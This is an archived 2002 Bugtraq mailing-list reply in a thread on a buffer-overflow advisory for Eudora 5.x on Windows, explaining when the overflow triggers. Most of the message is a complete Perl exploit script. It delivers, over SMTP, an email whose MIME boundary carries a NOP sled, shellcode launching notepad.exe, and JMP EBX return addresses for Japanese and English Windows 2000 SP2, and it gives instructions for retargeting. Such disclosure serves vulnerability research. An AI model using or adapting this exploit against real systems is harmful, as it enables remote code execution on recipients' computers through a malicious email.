[26615] in bugtraq
Re: [SNS Advisory No.55] Eudora 5.x for Windows Buffer Overflow Vulnerability
daemon@ATHENA.MIT.EDU (Kanatoko)
Sat Aug 10 16:19:51 2002
Message-ID: <20020810181725.13967.qmail@securityfocus.com>
Date: Sun, 11 Aug 2002 03:25:36 +0900
From: Kanatoko <anvil@jumperz.net>
To: bugtraq@securityfocus.com
In-Reply-To: <Pine.GSO.4.44.0208092111240.26627-100000@kilroy.uchicago.edu>
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Hi Steven.
> Likewise, when is the exploit triggered on Japanese Windows 2000 Pro?
Exploit triggered when the message is received and listed in the
"IN MailBox".
Please try this code.
It is a exploit code for Eudora 5.1.1 on Japanese win2k pro SP2.
If you use English win2k, pls modify the line 44
$buf .= $jmp_ebx_jp;
to
$buf .= $jmp_ebx_en;
and test it.
Sorry for my poor English.
#!/usr/local/bin/perl
#--------------------------------------------------
# Eudora Version 5.1.1 Sponsored Mode exploit
# for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko <anvil@jumperz.net>
# http://www.jumperz.net/
#--------------------------------------------------
use Socket;
#0x77e3ac97 JMP EBX ( Japanese SP2 )
$jmp_ebx_jp = "\x97\xAC\xE3\x77";
#0x77e2492b JMP EBX ( English SP2 )
$jmp_ebx_en = "\x2B\x49\xE2\x77";
$connect_host = 'mail.jumperz.net';
$port = 25;
$env_from = 'anvil@jumperz.net';
$env_to = 'target@jumperz.net';
$from = 'anvil@jumperz.net';
$to = 'target@jumperz.net';
$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
select(SOCKET); $|=1; select(STDOUT);
#egg written by UNYUN (http://www.shadowpenguin.org/)
#57bytes
$egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";
$buf = "\x90" x 117;
$buf .= $egg;
$buf .= "\xEB\xA0"; #JMP -0x60
$buf .= "A" x 2;
$buf .= $jmp_ebx_jp;
$hoge = <SOCKET>;
print SOCKET "HELO hoge\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "MAIL FROM:<$env_from>\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "RCPT TO:<$env_to>\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "DATA\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET << "_EOD_";
MIME-Version: 1.0\x0D
>From: $from\x0D
To: $to\x0D
Content-Type: multipart/mixed; boundary="$buf"\x0D
\x0D
.\x0D
_EOD_
$hoge = <SOCKET>;print $hoge;
print SOCKET "QUIT\x0D\x0A";
$hoge = <SOCKET>;
--
Kanatoko <anvil@jumperz.net>
JUMPER : http://www.jumperz.net/
On Fri, 9 Aug 2002 21:19:17 -0500 (CDT)
Steven Michaud <smch@midway.uchicago.edu> wrote:
> It's not too surprising that this exploit doesn't work on English
> Windows 2000 Pro, with or without SP2. But I can't even get it to
> crash Eudora (5.1 or 5.1.1) unless I open the hacked message,
> right-click on it, and feed it through the "Unwrap Text" plugin.
>
> Has anyone ported this exploit to English Windows 2000? If so, when
> is the exploit triggered? (In the preview pane? When you open the
> message? Under some other circumstances?)
>
> Likewise, when is the exploit triggered on Japanese Windows 2000 Pro?
>
> Thanks in advance!
>
